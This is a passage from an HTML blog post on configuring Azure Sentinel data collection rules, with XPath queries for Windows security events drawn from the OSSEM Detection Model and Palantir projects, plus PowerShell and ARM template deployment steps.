data-contrast="auto">| summarize&nbsp;count() by&nbsp;EventID</SPAN></PRE> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">As you can see in the image below, only events with Event ID 4624 were&nbsp;collected by the Azure Monitor Agent.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_20-1624563350656.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291068i864394B23E3318B9/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_20-1624563350656.png" alt="Cyb3rWard0g_20-1624563350656.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">You might be asking yourself, “<STRONG>Who would only&nbsp;want to&nbsp;collect events with Event ID 4624 from a Windows endpoint?</STRONG>”. Believe it or not, there are network environments where due to bandwidth constraints, they can only collect certain events. Therefore, this custom filtering capability is amazing and very useful to cover more use cases and even save storage!</SPAN><SPAN><BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2 aria-level="1">&nbsp;</H2> <H2 aria-level="1"><SPAN data-contrast="none">Any Good XPath Queries&nbsp;Repositories&nbsp;in the InfoSec Community?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Now that we know the internals of the new connector and how to deploy a simple lab environment, we can test multiple XPath queries depending on your organization and research use&nbsp;cases and bandwidth constraints. There are a few projects that you can use.</SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none">Palantir WEF Subscriptions</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">One of many repositories&nbsp;out there that contain XPath queries&nbsp;is the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">‘windows-event-forwarding' project</SPAN></A><SPAN data-contrast="auto">&nbsp;from Palantir. The XPath queries are Inside of&nbsp;the&nbsp;Windows Event Forwarding (WEF) subscriptions.&nbsp;We could take all the subscriptions and parse them&nbsp;programmatically&nbsp;to extract&nbsp;all&nbsp;the XPath queries saving them in&nbsp;a format that can be used to be part of the automatic deployment.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">You can run the following steps in this document available in Azure Sentinel To-go and extract XPath queries from the Palantir project.</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/README.md at master · OTRF/Azure-Sentinel2Go (github.com)</A>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H3 aria-level="2"><SPAN data-contrast="none">OSSEM Detection Model + ATT&amp;CK Data Sources</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">From a community perspective, another great resource you can use to extract XPath Queries from is the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Open Source Security Event Metadata (OSSEM) Detection Model (DM)&nbsp;project</SPAN></A><SPAN data-contrast="auto">. A community driven effort to&nbsp;help researchers&nbsp;model attack behaviors from a data perspective and share&nbsp;relationships identified in security events across several operating systems.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">One of the use cases from this initiative is&nbsp;to map all security events in the project to the new&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">‘Data Sources’&nbsp;objects provided by the MITRE ATT&amp;CK framework</SPAN></A><SPAN data-contrast="auto">.&nbsp;In the image below, we can see how the&nbsp;OSSEM DM project&nbsp;provides&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">an interactive document</SPAN></A><SPAN data-contrast="auto">&nbsp;(.CSV)&nbsp;for researchers to explore the&nbsp;mappings (Research output):</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_21-1624563350666.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291073iD31791A72DDC6086/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_21-1624563350666.png" alt="Cyb3rWard0g_21-1624563350666.png" /></span></P> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">One of the advantages of this project over others is that <A href="#" target="_self">all its data relationships</A> are in YAML format which&nbsp;makes it easy to translate to others formats. For example, <STRONG>XML</STRONG>. We can&nbsp;use the Event IDs defined in each <A href="#" target="_self">data relationship documented in OSSEM DM</A> and create XML files with XPath queries in them.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><STRONG><SPAN data-contrast="auto">Exploring OSSEM DM Relationships (YAML Files)</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Let’s say we&nbsp;want to&nbsp;use&nbsp;<A href="#" target="_self">relationships related to scheduled jobs</A> in Windows.</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_22-1624563350657.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291072i5E213CB9FE4AD5ED/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_22-1624563350657.png" alt="Cyb3rWard0g_22-1624563350657.png" /></span></P> <P>&nbsp;</P> <P><STRONG><SPAN data-contrast="auto">Translate YAML files to XML Query Lists</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">We can process all the YAML files and export the data in&nbsp;an&nbsp;XML&nbsp;files.&nbsp;One thing that I like about this OSSEM DM use case is that we can group the XML files by <A href="#" target="_self">ATT&amp;CK data sources.</A> This can help organizations organize their data collection in a way that can be mapped to detections or other ATT&amp;CK based frameworks internally.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We can use the <STRONG>QueryList</STRONG> format&nbsp;to document all '<STRONG>scheduled jobs relationships</STRONG>' XPath queries&nbsp;in one XML file.</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_23-1624563350647.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291071i4E91B0701CDD9BC8/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_23-1624563350647.png" alt="Cyb3rWard0g_23-1624563350647.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">I like to document my XPath queries&nbsp;first&nbsp;in this format because it expedites the validation process of the XPath queries locally on a Windows endpoint. You can use that XML file in a PowerShell command to query Windows Security events&nbsp;and make sure there are not syntax issues:</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <PRE>[xml]$scheduledjobs = get-content .\scheduled-job.xml<BR />Get-WinEvent&nbsp;-FilterXml $scheduledjobs</PRE> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_0-1624585337804.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291165i34FCF0A62CCE47DC/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_0-1624585337804.png" alt="Cyb3rWard0g_0-1624585337804.png" /></span></P> <P>&nbsp;</P> <P><STRONG><SPAN data-contrast="auto">Translate XML Query Lists to DCR&nbsp;Data&nbsp;Source:</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Finally, once the XPath queries have been validated, we could simply extract them from the XML files and put them in a format that could be used in ARM templates to create DCRs.&nbsp;&nbsp;Do you remember&nbsp;the <STRONG>dataSources</STRONG>&nbsp;property of the DCR Azure resource&nbsp;we talked about earlier? What if we could get the values of the <STRONG>windowsEventLogs</STRONG>&nbsp;data source directly from a file&nbsp;instead of hardcoding them in an ARM template?</SPAN><SPAN>&nbsp;The example below is how it was previously being hardcoded.<BR /></SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <PRE><SPAN data-contrast="none">"dataSources": {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; "windowsEventLogs": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "name": "eventLogsDataSource",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "scheduledTransferPeriod": "PT5M",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "streams": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Microsoft-SecurityEvent"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ],</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "xPathQueries": [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Security!*[System[(EventID=4624)]]"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp;&nbsp;&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="none">}</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">We could use the XML files created after processing OSSEM DM relationships mapped to ATT&amp;CK&nbsp;data sources&nbsp;and creating the following document. We can pass the URL of the document as a parameter in an ARM template to deploy our lab environment:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/ossem-attack.json at master · OTRF/Azure-Sentinel2Go (github.com)</A></SPAN></P> <P>&nbsp;</P> <H2><SPAN data-contrast="none">Wait! How Do You&nbsp;Create the Document?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">The <A href="#" target="_self">OSSEM&nbsp;team</A>&nbsp;is contributing&nbsp;and maintaining&nbsp;<A href="#" target="_self">the&nbsp;JSON file</A>&nbsp;from the previous section&nbsp;in the&nbsp;<A href="#" target="_self">Azure Sentinel2Go repository</A>.&nbsp;However, if you want to go through the whole process on your own, Jose Rodriguez (</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">@Cyb3rpandah</SPAN></A><SPAN data-contrast="auto">)&nbsp;was&nbsp;kind enough to write every single step&nbsp;to get to that output file in the following blog post:</SPAN><SPAN><BR /></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto"><A href="#" target="_blank" rel="noopener">OSSEM Detection Model: Leveraging Data Relationships to Generate Windows Event XPath Queries (openthreatresearch.com)</A></SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><SPAN data-contrast="none">Ok, But, How Do I&nbsp;Pass&nbsp;the JSON file&nbsp;to&nbsp;our Initial&nbsp;ARM template?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">In our <A href="#" target="_self">initial ARM template</A>, we had the XPath query&nbsp;as&nbsp;an ARM template variable as shown in the image below.</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_1-1624585923557.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291167i9C07EB631AAF2443/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_1-1624585923557.png" alt="Cyb3rWard0g_1-1624585923557.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We could also have it as a template parameter. However, it is <STRONG>not flexible&nbsp;enough to define multiple DCRs or even update the whole DCR Data Source object</STRONG>&nbsp;(Think about future coverage beyond Windows logs).</SPAN><SPAN><BR /></SPAN></P> <P>&nbsp;</P> <H2 aria-level="2"><SPAN data-contrast="none">Data Collection Rules – CREATE API</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">For more complex use cases, I would use the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">DCR Create API.</SPAN></A><SPAN data-contrast="auto">&nbsp;This can be&nbsp;executed&nbsp;via a PowerShell script which can also&nbsp;be&nbsp;used inside of an ARM template&nbsp;via&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">deployment scripts</SPAN></A><SPAN data-contrast="auto">. Keep in mind that, the deployment script resource requires an identity to execute the script.&nbsp;This <A href="#" target="_self">managed identity of type user-assigned</A> can be created at deployment time and used to create the DCRs&nbsp;programmatically.</SPAN><SPAN><BR /></SPAN></P> <H3 aria-level="2">&nbsp;</H3> <H3 aria-level="2"><SPAN data-contrast="none">PowerShell Script</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">If you have an Azure Sentinel instance without the data connector enabled, you can use the&nbsp;<A href="#" target="_self">following PowerShell script</A></SPAN><SPAN data-contrast="auto">&nbsp;to create DCRs in it. This is good for testing and it also works in ARM templates. </SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Keep in mind, that you would&nbsp;need to have a file where you can define the structure of the <STRONG>windowsEventLogs</STRONG>&nbsp;data source object used in the creation of DCRs. We created that in the previous section remember? </SPAN><SPAN data-contrast="auto">Here is where we can use the OSSEM Detection Model XPath Queries File&nbsp;</SPAN><SPAN data-contrast="auto">;)</img></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto"><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/ossem-attack.json at master · OTRF/Azure-Sentinel2Go (github.com)</A></SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><STRONG><SPAN data-contrast="auto">FileExample.json</SPAN></STRONG></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="auto">{</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; "windowsEventLogs":&nbsp; [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp; {</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Name":&nbsp; "eventLogsDataSource",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "scheduledTransferPeriod":&nbsp; "PT1M",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "streams":&nbsp; [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Microsoft-SecurityEvent"</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ],</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;<BR /></SPAN><SPAN data-contrast="auto"> "xPathQueries":&nbsp; [</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Security!*[System[(EventID=5141)]]",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Security!*[System[(EventID=5137)]]",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Security!*[System[(EventID=5136 or&nbsp;EventID=5139)]]",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Security!*[System[(EventID=4688)]]",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Security!*[System[(EventID=4660)]]",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Security!*[System[(EventID=4656 or&nbsp;EventID=4661)]]",</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Security!*[System[(EventID=4670)]]"</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;<BR /></SPAN><SPAN data-contrast="auto"> ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp;&nbsp;&nbsp; }</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">&nbsp; ]</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">}</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P>&nbsp;</P> <P><STRONG><SPAN data-contrast="auto">Run Script</SPAN></STRONG></P> <P>Once you have a JSON file similar to the one in the previous section, you can run the script from a PowerShell console:</P> <P>&nbsp;</P> <PRE><SPAN data-contrast="auto">.\Create-DataCollectionRules.ps1 -WorkspaceId&nbsp;xxxx&nbsp;-WorkspaceResourceId&nbsp;xxxx&nbsp;-ResourceGroup&nbsp;MYGROUP -Kind Windows -DataCollectionRuleName&nbsp;WinDCR&nbsp;-DataSourcesFile&nbsp;FileExample.json&nbsp;-Location&nbsp;eastus&nbsp;–verbose</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">One thing to remember is&nbsp;that you can&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">only have 10 Data Collection rules</SPAN></STRONG><SPAN data-contrast="auto">. That is different than&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">XPath queries inside of one DCR</SPAN></STRONG><SPAN data-contrast="auto">. If you&nbsp;attempt to&nbsp;create more than 10 DCRs, you will get the following error message:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="none">ERROR</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;<BR /><BR /></SPAN><SPAN data-contrast="auto">VERBOSE:&nbsp;@{Headers=System.Object[]; Version=1.1;&nbsp;StatusCode=400; Method=PUT;&nbsp;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">Content={"error":{"code":"InvalidPayload","message":"Data&nbsp;collection rule is&nbsp;invalid","details":[{"code":"InvalidProperty","message":"'Data&nbsp;Sources. Windows Event Logs' item count should be 10 or less. Specified list has 11 items.","target":"Properties.DataSources.WindowsEventLogs"}]}}}</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></PRE> <P><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">Also, if you have duplicate XPath queries in one DCR, you would&nbsp;get the following message:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <PRE><SPAN data-contrast="none">ERROR</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><BR /></SPAN><SPAN data-contrast="auto">VERBOSE:&nbsp;@{Headers=System.Object[]; Version=1.1;&nbsp;StatusCode=400; Method=PUT;&nbsp;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">Content={"error":{"code":"InvalidPayload","message":"Data&nbsp;collection rule is&nbsp;invalid","details":[{"code":"InvalidDataSource","message":"'X&nbsp;Path Queries' items must be unique (case-insensitively).&nbsp;</SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN>&nbsp;<BR /></SPAN><SPAN data-contrast="auto">Duplicate names:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;<BR />Security!*[System[(EventID=4688)]],Security!*[System[(EventID=4656)]].","target":"Properties.DataSources.WindowsEventLogs[0].XPathQueries"}]}}}&nbsp;<BR /></SPAN></PRE> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H3 aria-level="2"><SPAN data-contrast="none">ARM Template:&nbsp;DeploymentScript</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;Resource</SPAN></H3> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Now that you know how to use a PowerShell script to create DCRs directly to your Azure Sentinel instance, we can use it inside of an ARM template and make it point to the JSON file that contains all the XPath queries in the right format contributed by the OSSEM DM project. </SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">This is the template I use to put it all together:</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto"><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/Win10-DCR-DeploymentScript.json at master · OTRF/Azure-Sentinel2Go (github.com)</A></SPAN></P> <P>&nbsp;</P> <H3 aria-level="2"><SPAN data-contrast="none">What about the DCR Associations?&nbsp;</SPAN></H3> <P><SPAN data-contrast="auto">You still need to associate the DCR with a virtual machine. However, we can keep doing that within the template leveraging the <A href="#" target="_self">DCRAs Azure resource linked template</A>&nbsp;inside of the main template. Just in case you were wondering how I call the linked template from the main template, I do it this way:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/Win10-DCR-DeploymentScript.json at master · OTRF/Azure-Sentinel2Go (github.com)</A></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_2-1624586850130.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291168i404F0CE22E18FBD6/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_2-1624586850130.png" alt="Cyb3rWard0g_2-1624586850130.png" /></span></P> <P>&nbsp;</P> <H2>How Do I Deploy the New Template?</H2> <P>The same way how we deployed the initial one. If you want the Easy <STRONG>Button</STRONG> , then simply browse to the URL below and click on the blue button highlighted in the image below:</P> <P>&nbsp;</P> <P>Link:&nbsp;<A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/grocery-list/Win10/demos at master · OTRF/Azure-Sentinel2Go (github.com)</A></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_3-1624587103977.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291170i2157EE960113AC9D/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_3-1624587103977.png" alt="Cyb3rWard0g_3-1624587103977.png" /></span></P> <P>&nbsp;</P> <P>Wait 5-10 mins!</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_4-1624587184135.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291171i20D07D5FC684077E/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_4-1624587184135.png" alt="Cyb3rWard0g_4-1624587184135.png" /></span></P> <P>&nbsp;</P> <P>Enjoy it!</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Cyb3rWard0g_6-1624588013944.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/291174i48700DF747FD1EE3/image-size/large?v=v2&amp;px=999" role="button" title="Cyb3rWard0g_6-1624588013944.png" alt="Cyb3rWard0g_6-1624588013944.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">That’s it!&nbsp;You now know two ways to deploy and test the new data connector and <STRONG>Data Collection Rules</STRONG> features with <STRONG>XPath queries capabilities</STRONG>. I hope this was useful.&nbsp;Those were all my notes while testing and developing templates to create a lab environment so that you could also expedite the testing process!</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">Feedback is greatly appreciated! Thank you to the <A href="#" target="_self">OSSEM team</A> and the <A href="#" target="_self">Open Threat Research (OTR) community</A> for helping us operationalize the research they share with the community! Thank you,&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Jose Rodriguez</SPAN></A><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Demo Links</SPAN></H2> <UL> <LI><A href="#" target="_blank" rel="noopener">Azure-Sentinel2Go/grocery-list/Win10/demos at master · OTRF/Azure-Sentinel2Go 